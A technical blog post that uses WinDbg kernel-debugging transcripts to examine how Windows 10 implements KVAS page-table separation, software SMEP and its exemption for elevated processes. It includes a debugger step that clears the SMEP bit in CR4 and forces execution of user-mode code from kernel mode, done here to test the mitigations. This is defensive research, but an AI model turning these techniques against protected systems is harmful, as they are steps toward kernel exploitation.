KVAS Implementation

For the first experiment, I will show the effect of KVAS by showing a function that exists in one page table, but not the other on the KVAS enabled system. I will also show that the system call handler is different between the two systems.

First, I will switch process contexts to explorer.exe then I will look at what is in MSR 0xC0000082 (LSTAR). Next, I will look up the page tables used by the process and try to resolve the physical address of nt!NtCreateFile in each page table using !vtop.

KVAS Enabled

1: kd> !cpuinfo
CP  F/M/S Manufacturer  MHz PRCB Signature    MSR 8B Signature Features
 0  6,158,10 GenuineIntel 2592 000000d600000000                   311b3dff
 1  6,158,10 GenuineIntel 2592 000000d600000000 >000000d600000000
1: kd> !process 0 0 explorer.exe
PROCESS ffffb68d61dd9080
    SessionId: 1  Cid: 1098    Peb: 00fa4000  ParentCid: 1078
    DirBase: bd6de002  ObjectTable: ffffde87c9020e00  HandleCount: 2360.
    Image: explorer.exe

1: kd> .process /i /p ffffb68d61dd9080
You need to continue execution (press 'g' ) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
1: kd> g
Break instruction exception - code 80000003 (first chance)
nt!DbgBreakPointWithStatus:
fffff804`745fd0b0 cc              int     3
1: kd> .reload
Connected to Windows 10 19041 x64 target at (Fri Nov 27 20:52:29.550 2020 (UTC - 5:00)), ptr64 TRUE
Loading Kernel Symbols
...............................................................
................................................................
Loading User Symbols
.......................................................
Loading unloaded module list
1: kd> dt nt!_KPROCESS @$proc DirectoryTableBase
   +0x028 DirectoryTableBase : 0xbd6de002
1: kd> dt nt!_KPROCESS @$proc UserDirectoryTableBase
   +0x388 UserDirectoryTableBase : 0xbd6dd001
1: kd> dt nt!_KPCR @$pcr Prcb.KernelDirectoryTableBase
   +0x180 Prcb                          : 
      +0x8e80 KernelDirectoryTableBase      : 0x80000000`bd6de002
1: kd> rdmsr c0000082
msr[c0000082] = fffff804`74c13180
1: kd> ln fffff804`74c13180
Browse module
Set bu breakpoint

(fffff804`74c13180)   nt!KiSystemCall64Shadow   |  (fffff804`74c14060)   nt!_guard_retpoline_icall_handler
Exact matches:
1: kd> ? nt!NtCreateFile
Evaluate expression: -8776958611312 = fffff804`747ff090
1: kd> !vtop
usage: vtop PFNOfPDE VA
1: kd> !vtop 0xbd6de000 0xfffff804747ff090
Amd64VtoP: Virt fffff804747ff090, pagedir 00000000bd6de000
Amd64VtoP: PML4E 00000000bd6def80
Amd64VtoP: PDPE 0000000004809088
Amd64VtoP: PDE 000000000480ad18
Amd64VtoP: Large page mapped phys 0000000002dff090
Virtual address fffff804747ff090 translates to physical address 2dff090.
1: kd> !vtop 0xbd6dd000 0xfffff804747ff090
Amd64VtoP: Virt fffff804747ff090, pagedir 00000000bd6dd000
Amd64VtoP: PML4E 00000000bd6ddf80
Amd64VtoP: PDPE 000000013cd21088
Amd64VtoP: PDE 000000013cd20d18
Amd64VtoP: zero PDE
Virtual address fffff804747ff090 translation fails, error 0xD0000147.
1: kd> r cr3
cr3=00000000bd6de002
1: kd> !pte nt!NtCreateFile
                                           VA fffff804747ff090
PXE at FFFF87C3E1F0FF80    PPE at FFFF87C3E1FF0088    PDE at FFFF87C3FE011D18    PTE at FFFF87FC023A3FF8
contains 0000000004809063  contains 000000000480A063  contains 0A00000002C000A1  contains 0000000000000000
pfn 4809      ---DA--KWEV  pfn 480a      ---DA--KWEV  pfn 2c00      --L-A--KREV  LARGE PAGE pfn 2dff        

1: kd> !pte ntdll!NtCreateFile
                                           VA 00007ffe181ec830
PXE at FFFF87C3E1F0F7F8    PPE at FFFF87C3E1EFFFC0    PDE at FFFF87C3DFFF8600    PTE at FFFF87BFFF0C0F60
contains 8A0000003F8EA867  contains 0A0000003DFF0867  contains 0A0000003DFF1867  contains 01000001006B4025
pfn 3f8ea     ---DA--UW-V  pfn 3dff0     ---DA--UWEV  pfn 3dff1     ---DA--UWEV  pfn 1006b4    ----A--UREV

KVAS Disabled

0: kd> !cpuinfo
CP  F/M/S Manufacturer  MHz PRCB Signature    MSR 8B Signature Features
 0  6,158,10 GenuineIntel 2592 000000d600000000 >000000d600000000
0: kd> !process 0 0 explorer.exe
PROCESS ffffc8064497b340
    SessionId: 1  Cid: 1038    Peb: 0090c000  ParentCid: 100c
    DirBase: beb3c000  ObjectTable: ffffa2827c3a1800  HandleCount: 2254.
    Image: explorer.exe

0: kd> .process /i /p ffffc8064497b340
You need to continue execution (press 'g' ) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!DbgBreakPointWithStatus:
fffff805`2e1fd0b0 cc              int     3
0: kd> .reload
Connected to Windows 10 19041 x64 target at (Fri Nov 27 20:52:32.030 2020 (UTC - 5:00)), ptr64 TRUE
Loading Kernel Symbols
...............................................................
................................................................
...............................................................
Loading User Symbols
.............
Loading unloaded module list
.............
0: kd> dt nt!_KPROCESS @$proc DirectoryTableBase
   +0x028 DirectoryTableBase : 0xbeb3c000
0: kd> dt nt!_KPROCESS @$proc UserDirectoryTableBase
   +0x388 UserDirectoryTableBase : 0
0: kd> dt nt!_KPCR @$pcr Prcb.KernelDirectoryTableBase
   +0x180 Prcb                          : 
      +0x8e80 KernelDirectoryTableBase      : 0
0: kd> rdmsr c0000082
msr[c0000082] = fffff805`2e2066c0
0: kd> ln fffff805`2e2066c0
Browse module
Set bu breakpoint

(fffff805`2e2066c0)   nt!KiSystemCall64   |  (fffff805`2e206900)   nt!KiSystemServiceUser
Exact matches:
0: kd> ? nt!NtCreateFile
Evaluate expression: -8773842243440 = fffff805`2e3ff090
0: kd> !vtop 0xbeb3c000 0xfffff8052e3ff090
Amd64VtoP: Virt fffff8052e3ff090, pagedir 00000000beb3c000
Amd64VtoP: PML4E 00000000beb3cf80
Amd64VtoP: PDPE 0000000004b090a0
Amd64VtoP: PDE 0000000004b0ab88
Amd64VtoP: Large page mapped phys 0000000002dff090
Virtual address fffff8052e3ff090 translates to physical address 2dff090.
0: kd> r cr3
cr3=00000000beb3c000
0: kd> !pte nt!NtCreateFile
                                           VA fffff8052e3ff090
PXE at FFFFE5F2F97CBF80    PPE at FFFFE5F2F97F00A0    PDE at FFFFE5F2FE014B88    PTE at FFFFE5FC02971FF8
contains 0000000004B09063  contains 0000000004B0A063  contains 0A00000002C001A1  contains 0000000000000000
pfn 4b09      ---DA--KWEV  pfn 4b0a      ---DA--KWEV  pfn 2c00      -GL-A--KREV  LARGE PAGE pfn 2dff        

0: kd> !pte ntdll!NtCreateFile
                                           VA 00007ffc3608c830
PXE at FFFFE5F2F97CB7F8    PPE at FFFFE5F2F96FFF80    PDE at FFFFE5F2DFFF0D80    PTE at FFFFE5BFFE1B0460
contains 0A000000BC048867  contains 0A0000000604E867  contains 0A00000005350867  contains 010000006A1EC025
pfn bc048     ---DA--UWEV  pfn 604e      ---DA--UWEV  pfn 5350      ---DA--UWEV  pfn 6a1ec     ----A--UREV

Results

The page table lookup for nt!NtCreateFile fails for the user page table on the KVAS enabled system! This means KVAS is working just fine.

Software SMEP

For the next test, I will show that Software SMEP is enforced at the top level of the page tables on a KVAS enabled system.

I will resolve the address of the PML4 entry for ntdll!NtCreateFile for all page tables utilized via !vtop, then I will look at the page permissions applied using dt -p.

KVAS Enabled

1: kd> ? ntdll!NtCreateFile
Evaluate expression: 140729303091248 = 00007ffe`181ec830
1: kd> !vtop 0xbd6dd000 0x00007ffe181ec830
Amd64VtoP: Virt 00007ffe181ec830, pagedir 00000000bd6dd000
Amd64VtoP: PML4E 00000000bd6dd7f8
Amd64VtoP: PDPE 000000003f8eafc0
Amd64VtoP: PDE 000000003dff0600
Amd64VtoP: PTE 000000003dff1f60
Amd64VtoP: Mapped phys 00000001006b4830
Virtual address 7ffe181ec830 translates to physical address 1006b4830.
1: kd> !vtop 0xbd6de000 0x00007ffe181ec830
Amd64VtoP: Virt 00007ffe181ec830, pagedir 00000000bd6de000
Amd64VtoP: PML4E 00000000bd6de7f8
Amd64VtoP: PDPE 000000003f8eafc0
Amd64VtoP: PDE 000000003dff0600
Amd64VtoP: PTE 000000003dff1f60
Amd64VtoP: Mapped phys 00000001006b4830
Virtual address 7ffe181ec830 translates to physical address 1006b4830.
1: kd> dt -p nt!_MMPTE_HARDWARE @@(0x0000000bd6dd7f8)
   +0x000 Valid            : 0y1
   +0x000 Dirty1           : 0y1
   +0x000 Owner            : 0y1
   +0x000 WriteThrough     : 0y0
   +0x000 CacheDisable     : 0y0
   +0x000 Accessed         : 0y1
   +0x000 Dirty            : 0y1
   +0x000 LargePage        : 0y0
   +0x000 Global           : 0y0
   +0x000 CopyOnWrite      : 0y0
   +0x000 Unused           : 0y0
   +0x000 Write            : 0y1
   +0x000 PageFrameNumber  : 0y000000000000000000111111100011101010 (0x3f8ea)
   +0x000 ReservedForHardware : 0y0000
   +0x000 ReservedForSoftware : 0y0000
   +0x000 WsleAge          : 0y1010
   +0x000 WsleProtection   : 0y000
   +0x000 NoExecute        : 0y0
1: kd> dt -p nt!_MMPTE_HARDWARE @@(0x00000000bd6de7f8)
   +0x000 Valid            : 0y1
   +0x000 Dirty1           : 0y1
   +0x000 Owner            : 0y1
   +0x000 WriteThrough     : 0y0
   +0x000 CacheDisable     : 0y0
   +0x000 Accessed         : 0y1
   +0x000 Dirty            : 0y1
   +0x000 LargePage        : 0y0
   +0x000 Global           : 0y0
   +0x000 CopyOnWrite      : 0y0
   +0x000 Unused           : 0y0
   +0x000 Write            : 0y1
   +0x000 PageFrameNumber  : 0y000000000000000000111111100011101010 (0x3f8ea)
   +0x000 ReservedForHardware : 0y0000
   +0x000 ReservedForSoftware : 0y0000
   +0x000 WsleAge          : 0y1010
   +0x000 WsleProtection   : 0y000
   +0x000 NoExecute        : 0y1

KVAS Disabled

0: kd> ? ntdll!NtCreateFile
Evaluate expression: 140721215031344 = 00007ffc`3608c830
0: kd> !vtop 0xbeb3c000 0x00007ffc3608c830
Amd64VtoP: Virt 00007ffc3608c830, pagedir 00000000beb3c000
Amd64VtoP: PML4E 00000000beb3c7f8
Amd64VtoP: PDPE 00000000bc048f80
Amd64VtoP: PDE 000000000604ed80
Amd64VtoP: PTE 0000000005350460
Amd64VtoP: Mapped phys 000000006a1ec830
Virtual address 7ffc3608c830 translates to physical address 6a1ec830.
0: kd> dt -p nt!_MMPTE_HARDWARE @@(0x0000000beb3c7f8)
   +0x000 Valid            : 0y1
   +0x000 Dirty1           : 0y1
   +0x000 Owner            : 0y1
   +0x000 WriteThrough     : 0y0
   +0x000 CacheDisable     : 0y0
   +0x000 Accessed         : 0y1
   +0x000 Dirty            : 0y1
   +0x000 LargePage        : 0y0
   +0x000 Global           : 0y0
   +0x000 CopyOnWrite      : 0y0
   +0x000 Unused           : 0y0
   +0x000 Write            : 0y1
   +0x000 PageFrameNumber  : 0y000000000000000010111100000001001000 (0xbc048)
   +0x000 ReservedForHardware : 0y0000
   +0x000 ReservedForSoftware : 0y0000
   +0x000 WsleAge          : 0y1010
   +0x000 WsleProtection   : 0y000
   +0x000 NoExecute        : 0y0

Results

The PML4 entry for the kernel page table has the NoExecute bit set for user mode addresses. Even if the processor does not support SMEP, an access violation will be thrown on attempted execution from kernel mode if the kernel page table is in CR3. The KVAS disabled system does not have separate page tables, so the user code must be executable.
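To compare entries without reading dt output field by field, the raw QWORD can be decoded directly. This is a small sketch: the field names and widths follow the dt nt!_MMPTE_HARDWARE listing above, decode is a made-up helper, and the user table value is reconstructed from the dt output (identical fields with NoExecute clear) rather than copied from a dump.

```python
FIELDS = [  # (name, bit width), lowest bit first, in dt nt!_MMPTE_HARDWARE order
    ("Valid", 1), ("Dirty1", 1), ("Owner", 1), ("WriteThrough", 1),
    ("CacheDisable", 1), ("Accessed", 1), ("Dirty", 1), ("LargePage", 1),
    ("Global", 1), ("CopyOnWrite", 1), ("Unused", 1), ("Write", 1),
    ("PageFrameNumber", 36), ("ReservedForHardware", 4),
    ("ReservedForSoftware", 4), ("WsleAge", 4), ("WsleProtection", 3),
    ("NoExecute", 1),
]

def decode(entry: int) -> dict:
    """Split a 64-bit page table entry into its named bitfields."""
    out, bit = {}, 0
    for name, width in FIELDS:
        out[name] = (entry >> bit) & ((1 << width) - 1)
        bit += width
    return out

kernel_pml4e = 0x8A0000003F8EA867  # PXE shown by !pte with the kernel table in CR3
user_pml4e = 0x0A0000003F8EA867    # reconstructed: same fields, NoExecute = 0

k, u = decode(kernel_pml4e), decode(user_pml4e)
print({name: (u[name], k[name]) for name in k if u[name] != k[name]})
# {'NoExecute': (0, 1)}
```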

KVAS Disabled in Privileged Processes

Next up is showing that KVAS is disabled for privileged/elevated processes.

I will switch to a non-elevated instance of cmd.exe and look at _KPROCESS.DirectoryTableBase, _KPROCESS.UserDirectoryTableBase, _KPROCESS.AddressPolicy, _KPRCB.KernelDirectoryTableBase, and _KPRCB.ShadowFlags and then I will show the same fields when in the context of an elevated cmd.exe instance.

Non-Elevated Process

0: kd> !process 0 0 cmd.exe
PROCESS ffffb68d5b96f080
    SessionId: 1  Cid: 0dd4    Peb: 100343000  ParentCid: 1098
    DirBase: 0785a002  ObjectTable: ffffde87d25062c0  HandleCount:  68.
    Image: cmd.exe

0: kd> .process /i /p ffffb68d5b96f080
You need to continue execution (press 'g' ) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!DbgBreakPointWithStatus:
fffff804`745fd0b0 cc              int     3
1: kd> dt nt!_KPROCESS @$proc DirectoryTableBase UserDirectoryTableBase AddressPolicy
   +0x028 DirectoryTableBase     : 0x785a002
   +0x388 UserDirectoryTableBase : 0xbb659001
   +0x390 AddressPolicy          : 0 ''
1: kd> dt nt!_KPRCB @$prcb KernelDirectoryTableBase ShadowFlags
   +0x8e80 KernelDirectoryTableBase : 0x80000000`0785a002
   +0x8e98 ShadowFlags              : 1

Elevated Process

0: kd> !process 0 0 cmd.exe
PROCESS ffffb68d63bb7080
    SessionId: 1  Cid: 0a58    Peb: 52134af000  ParentCid: 1098
    DirBase: 8b073002  ObjectTable: ffffde87d250e100  HandleCount:  65.
    Image: cmd.exe

0: kd> .process /i /p ffffb68d63bb7080
You need to continue execution (press 'g' ) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!DbgBreakPointWithStatus:
fffff804`745fd0b0 cc              int     3
1: kd> dt nt!_KPROCESS @$proc DirectoryTableBase UserDirectoryTableBase AddressPolicy
   +0x028 DirectoryTableBase     : 0x8b073002
   +0x388 UserDirectoryTableBase : 1
   +0x390 AddressPolicy          : 0x1 ''
1: kd> dt nt!_KPRCB @$prcb KernelDirectoryTableBase ShadowFlags
   +0x8e80 KernelDirectoryTableBase : 0x80000000`8b073002
   +0x8e98 ShadowFlags              : 2

Results

The non-elevated process has a _KPROCESS.AddressPolicy of 0 and the 1st bit of _KPRCB.ShadowFlags set. The elevated process does not have a valid _KPROCESS.UserDirectoryTableBase, has a _KPROCESS.AddressPolicy of 1, and has the 2nd bit set in _KPRCB.ShadowFlags.
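To make the comparison a little more mechanical, here is a minimal Python sketch that splits the CR3-style values from the two transcripts above into a page-aligned base, the low 12 bits, and bit 63. The helper names are hypothetical. Treating the low 12 bits as a PCID and bit 63 as the "no flush" hint is the architectural x64 meaning of those CR3 bits when PCIDs are enabled, and it is my assumption that Windows uses them that way in these fields.

```python
PAGE_MASK = 0xFFF        # low 12 bits: not part of the page-aligned physical base
BIT_63 = 1 << 63         # architecturally the "no flush" hint on a CR3 write with PCIDs


def split_dirbase(value):
    """Split a CR3-style value into (physical base, low 12 bits, bit 63 set?)."""
    base = value & ~BIT_63 & ~PAGE_MASK
    return base, value & PAGE_MASK, bool(value & BIT_63)


def has_user_page_table(user_dirbase):
    """Assumption: a user (shadow) table exists only if the base is non-zero."""
    return split_dirbase(user_dirbase)[0] != 0


# Values copied from the debugger output above.
processes = {
    "non-elevated": {"dir": 0x785A002, "user": 0xBB659001, "prcb": 0x800000000785A002},
    "elevated": {"dir": 0x8B073002, "user": 0x1, "prcb": 0x800000008B073002},
}

for name, p in processes.items():
    base, low_bits, bit63 = split_dirbase(p["prcb"])
    print(name, hex(base), hex(low_bits), bit63, has_user_page_table(p["user"]))
```

In both cases _KPRCB.KernelDirectoryTableBase is just _KPROCESS.DirectoryTableBase with bit 63 set, and only the non-elevated process has a UserDirectoryTableBase that points at an actual page.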

Faults

For this section I will be testing the existence of software SMEP by running every permutation of KVAS enabled/disabled and SMEP enabled/disabled. For each case I have outlined an expected result, just for fun. Let's see if my assumptions match up with reality!

To test, I'll context switch to a KVAS enabled process (or any process on the KVAS disabled system), set the instruction pointer to executable code in user mode, then I'll single step and see what happens to the system in each case.
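As a quick sketch of the test matrix, the Python below enumerates the four permutations and the hypothesis being tested: either mechanism alone should be enough to fault on kernel-mode execution of a user page. The function names are hypothetical and the sample CR4 value is made up for illustration. The one hard fact in here is that SMEP is controlled by bit 20 of CR4, which is the bit that has to be cleared for the SMEP-disabled cases.

```python
from itertools import product

CR4_SMEP = 1 << 20  # SMEP enable is bit 20 of CR4


def clear_smep(cr4):
    """Return the CR4 value with the SMEP bit cleared."""
    return cr4 & ~CR4_SMEP


def expect_fault(kvas_enabled, smep_enabled):
    """Hypothesis: hardware SMEP or the KVAS page tables alone should fault."""
    return kvas_enabled or smep_enabled


for kvas, smep in product((True, False), repeat=2):
    outcome = "fault" if expect_fault(kvas, smep) else "executes"
    print(f"KVAS={'on' if kvas else 'off':3}  SMEP={'on' if smep else 'off':3}  expected: {outcome}")

# Made-up CR4 value, only to show the bit manipulation.
print(hex(clear_smep(0x1506F8)))
```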

KVAS Enabled, SMEP Enabled

Expected result: fault on user mode page execution in kernel mode

0: kd> !process 0 0 explorer.exe
PROCESS ffff848c6c231340
    SessionId: 1  Cid: 10b8    Peb: 00d61000  ParentCid: 1064
    DirBase: b3bd4002  ObjectTable: ffffc40b7e99ec00  HandleCount: 1684.
    Image: explorer.exe

0: kd> .process /i /p ffff848c6c231340
You need to continue execution (press 'g' ) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!DbgBreakPointWithStatus:
fffff804`445fd0b0 cc              int     3
1: kd> .reload /user
Loading User Symbols
................................................................
................................................................
................................................................
................................................................
..........
1: kd> u kernel32+216e L1
KERNEL32!SortGetSortKey+0xede:
00007fff`a74c216e cc              int     3
1: kd> r rip=kernel32+216e
1: kd> p
KERNEL32!SortGetSortKey+0xedf:
00007fff`a74c216f fc              cld
1: kd> p
KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x000000fc
                       (0x00007FFFA74C216F,0x0200000008782025,0xFFFFFB874D733940,0x0000000080000005)


A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff804`445fd0b0 cc              int     3
1: kd> g
Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff804`445fd0b0 cc              int     3
1: kd> !analyze -v
Connected to Windows 10 19041 x64 target at (Fri Nov 27 22:45:37.050 2020 (UTC - 5:00)), ptr64 TRUE
Loading Kernel Symbols
...............................................................
................................................................
.............................................................
Loading User Symbols
................................................................
................................................................
................................................................
................................................................
..........
Loading unloaded module list
................
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY (fc)
An attempt was made to execute non-executable memory.  The guilty driver
is on the stack trace (and is typically the current instruction pointer).
When possible, the guilty driver's name (Unicode string) is printed on
the bugcheck screen and saved in KiBugCheckDriver.
Arguments:
Arg1: 00007fffa74c216f, Virtual address for the attempted execute.
Arg2: 0200000008782025, PTE contents.
Arg3: fffffb874d733940, (reserved)
Arg4: 0000000080000005, (reserved)

KVAS Disabled, SMEP Enabled

Expected result: fault on user mode page execution in kernel mode

0: kd> !process 0 0 explorer.exe
PROCESS ffff9787d1477080
    SessionId: 1  Cid: 10ac    Peb: 01182000  ParentCid: 1094
    DirBase: b2f75000  ObjectTable: ffff8601a3fc3200  HandleCount: 1911.
    Image: explorer.exe

0: kd> .process /i /p ffff9787d1477080
You need to continue execution (press 'g' ) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!DbgBreakPointWithStatus:
fffff801`2a9fd0b0 cc              int     3
1: kd> .reload /user
Loading User Symbols
................................................................
................................................................
................................................................
..............................................................
1: kd> u kernel32+216e L1
KERNEL32!SortGetSortKey+0xede:
00007ffb`a752216e cc              int     3
1: kd> r rip=kernel32+216e
1: kd> p
KERNEL32!SortGetSortKey+0xedf:
00007ffb`a752216f fc              cld
1: kd> p
KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x000000fc
                       (0x00007FFBA752216F,0x010000000A8B1025,0xFFFFED060F7F0940,0x0000000080000005)


A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff801`2a9fd0b0 cc              int     3
1: kd> g
Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff801`2a9fd0b0 cc              int     3
1: kd> !analyze -v
Connected to Windows 10 19041 x64 target at (Fri Nov 27 22:48:37.554 2020 (UTC - 5:00)), ptr64 TRUE
Loading Kernel Symbols
...............................................................
................................................................
.............................................................
Loading User Symbols
................................................................
................................................................
................................................................
..............................................................
Loading unloaded module list
..............
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY (fc)
An attempt was made to execute non-executable memory.  The guilty driver
is on the stack trace (and is typically the current instruction pointer).
When possible, the guilty driver's name (Unicode string) is printed on
the bugcheck screen and saved in KiBugCheckDriver.
Arguments:
Arg1: 00007ffba752216f, Virtual address for the attempted execute.
Arg2: 010000000a8b1025, PTE contents.
Arg3: ffffed060f7f0940, (reserved)
Arg4: 0000000080000005, (reserved)

KVAS Enabled, SMEP Disabled

Expected result: fault on user mode page execution in kernel mode via Software SMEP

0: kd> !process 0 0 explorer.exe
PROCESS ffffd18ad3a31340
    SessionId: 1  Cid: 0acc    Peb: 00c3c000  ParentCid: 0d20
    DirBase: 3f159002  ObjectTable: ffffac865a3e3780  HandleCount: 1667.
    Image: explorer.exe

0: kd> .process /i /p ffffd18ad3a31340
You need to continue execution (press 'g' ) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
1: kd> .reload /user
Loading User Symbols
................................................................
................................................................
................................................................
................................................................


************* Symbol Loading Error Summary **************
Module name            Error
SharedUserData         No error - symbol load deferred

You can troubleshoot most symbol related issues by turning on symbol loading diagnostics (!sym noisy) and repeating the command that caused symbols to be loaded.
You should also verify that your symbol search path (.sympath) is correct.
1: kd> u kernel32+216e L1
KERNEL32!SortGetSortKey+0xede:
00007ff9`abfd216e cc              int     3
1: kd> r rip=kernel32+216e
1: kd> r cr4=@@C++(@cr4 & ~(1 << 20))
1: kd> p
KERNEL32!SortGetSortKey+0xedf:
00007ff9`abfd216f fc              cld
1: kd> p
KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x000000fc
                       (0x00007FF9ABFD216F,0x030000000F670025,0xFFFF9884AB7F0940,0x0000000080000005)


A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff803`753fd0b0 cc              int     3
1: kd> !analyze -v
The debuggee is ready to run
1: kd> !analyze -v
The debuggee is ready to run
1: kd> g
Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff803`753fd0b0 cc              int     3
1: kd> !analyze -v
Connected to Windows 10 19041 x64 target at (Fri Nov 27 22:40:28.176 2020 (UTC - 5:00)), ptr64 TRUE
Loading Kernel Symbols
...............................................................
................................................................
.............................................................
Loading User Symbols
................................................................
................................................................
................................................................
................................................................

Loading unloaded module list
.............................

************* Symbol Loading Error Summary **************
Module name            Error
SharedUserData         No error - symbol load deferred

You can troubleshoot most symbol related issues by turning on symbol loading diagnostics (!sym noisy) and repeating the command that caused symbols to be loaded.
You should also verify that your symbol search path (.sympath) is correct.
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY (fc)
An attempt was made to execute non-executable memory.  The guilty driver
is on the stack trace (and is typically the current instruction pointer).
When possible, the guilty driver's name (Unicode string) is printed on
the bugcheck screen and saved in KiBugCheckDriver.
Arguments:
Arg1: 00007ff9abfd216f, Virtual address for the attempted execute.
Arg2: 030000000f670025, PTE contents.
Arg3: ffff9884ab7f0940, (reserved)
Arg4: 0000000080000005, (reserved)

KVAS Disabled, SMEP Disabled

Expected result: successful execution in a user mode page

0: kd> !process 0 0 explorer.exe
PROCESS ffff840ec792c340
    SessionId: 1  Cid: 1050    Peb: 00380000  ParentCid: 1024
    DirBase: b2f4f000  ObjectTable: ffff948cdda96d40  HandleCount: 1952.
    Image: explorer.exe

0: kd> .process /i /p ffff840ec792c340
You need to continue execution (press 'g' ) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!DbgBreakPointWithStatus:
fffff806`743fd0b0 cc              int     3
1: kd> .reload /user
Loading User Symbols
................................................................
................................................................
................................................................
..............................................................
1: kd> r rip=kernel32+216e
1: kd> u kernel32+216e
KERNEL32!SortGetSortKey+0xede:
00007ff8`b5a0216e cc              int     3
00007ff8`b5a0216f fc              cld
00007ff8`b5a02170 ff              ???
00007ff8`b5a02171 ff418b          inc     dword ptr [rcx-75h]
00007ff8`b5a02174 c24d8d          ret     8D4Dh
00007ff8`b5a02177 3c44            cmp     al,44h
00007ff8`b5a02179 0f1f8000000000  nop     dword ptr [rax]
00007ff8`b5a02180 418d0413        lea     eax,[r11+rdx]
1: kd> u kernel32+216e L1
KERNEL32!SortGetSortKey+0xede:
00007ff8`b5a0216e cc              int     3
1: kd> r cr4=@@C++(@cr4 & ~(1 << 20))
1: kd> p
KERNEL32!SortGetSortKey+0xedf:
00007ff8`b5a0216f fc              cld
1: kd> p
00007ff8`b5a02170 ff              ???

No crash!!

Results

As expected, all tests but the last caused a crash immediately. Interestingly, the CPU executed the breakpoint instruction and crashed on the next instruction on every test that crashed. Instruction caching? Or just how the CPU is designed. Very interesting!
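The "PTE contents" argument of each bugcheck can be decoded by hand, too. Here's a minimal Python sketch that walks the _MMPTE_HARDWARE bitfields in the order dt prints them in this post (the field widths are taken from that output, and decode_pte is a hypothetical helper name). Under that layout, all three reported values decode with Owner set and NoExecute clear, which would be consistent with the fault being imposed by SMEP or by a higher-level table entry rather than by the leaf PTE itself. Take that interpretation as a guess, not something the bugcheck states.

```python
# _MMPTE_HARDWARE bitfields, lowest bit first, as printed by dt in this post.
FIELDS = [
    ("Valid", 1), ("Dirty1", 1), ("Owner", 1), ("WriteThrough", 1),
    ("CacheDisable", 1), ("Accessed", 1), ("Dirty", 1), ("LargePage", 1),
    ("Global", 1), ("CopyOnWrite", 1), ("Unused", 1), ("Write", 1),
    ("PageFrameNumber", 36), ("ReservedForHardware", 4),
    ("ReservedForSoftware", 4), ("WsleAge", 4), ("WsleProtection", 3),
    ("NoExecute", 1),
]


def decode_pte(value):
    """Decode a raw 64-bit PTE into a dict of field name -> integer value."""
    fields, shift = {}, 0
    for name, width in FIELDS:
        fields[name] = (value >> shift) & ((1 << width) - 1)
        shift += width
    return fields


# Arg2 values copied from the three bugchecks above.
for raw in (0x0200000008782025, 0x010000000A8B1025, 0x030000000F670025):
    pte = decode_pte(raw)
    print(hex(raw), "Owner:", pte["Owner"], "NoExecute:", pte["NoExecute"],
          "PFN:", hex(pte["PageFrameNumber"]))
```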

noexecute
:(

Wrap up

I hope you've learned a thing or two from this. I've been wanting to do this investigation for a while, just to nail down the implementation details here. If you have questions feel free to reach out on Twitter @jgeigerm. For now and as always ~~h a v e f u n i n s i d e~~.

Bonus: WinDbg Bug

There's a bug in the dt command where it sign extends bit 31 on 64-bit values making it impossible to do dt -p on some values:

1: kd> dt -p nt!_MMPTE_HARDWARE 0x0000000bd6de7f8
   +0x000 Valid            : ??
   +0x000 Dirty1           : ??
   +0x000 Owner            : ??
   +0x000 WriteThrough     : ??
   +0x000 CacheDisable     : ??
   +0x000 Accessed         : ??
   +0x000 Dirty            : ??
   +0x000 LargePage        : ??
   +0x000 Global           : ??
   +0x000 CopyOnWrite      : ??
   +0x000 Unused           : ??
   +0x000 Write            : ??
   +0x000 PageFrameNumber  : ??
   +0x000 ReservedForHardware : ??
   +0x000 ReservedForSoftware : ??
   +0x000 WsleAge          : ??
   +0x000 WsleProtection   : ??
   +0x000 NoExecute        : ??
Memory read error ffffffffbd6de7f8

Totally bogus! The solution I found was to wrap the value in the MASM or C++ interpreter:

1: kd> dt -p nt!_MMPTE_HARDWARE @@C++(0x00000000bd6de7f8)
   +0x000 Valid            : 0y1
   +0x000 Dirty1           : 0y1
   +0x000 Owner            : 0y1
   +0x000 WriteThrough     : 0y0
   +0x000 CacheDisable     : 0y0
   +0x000 Accessed         : 0y1
   +0x000 Dirty            : 0y1
   +0x000 LargePage        : 0y0
   +0x000 Global           : 0y0
   +0x000 CopyOnWrite      : 0y0
   +0x000 Unused           : 0y0
   +0x000 Write            : 0y1
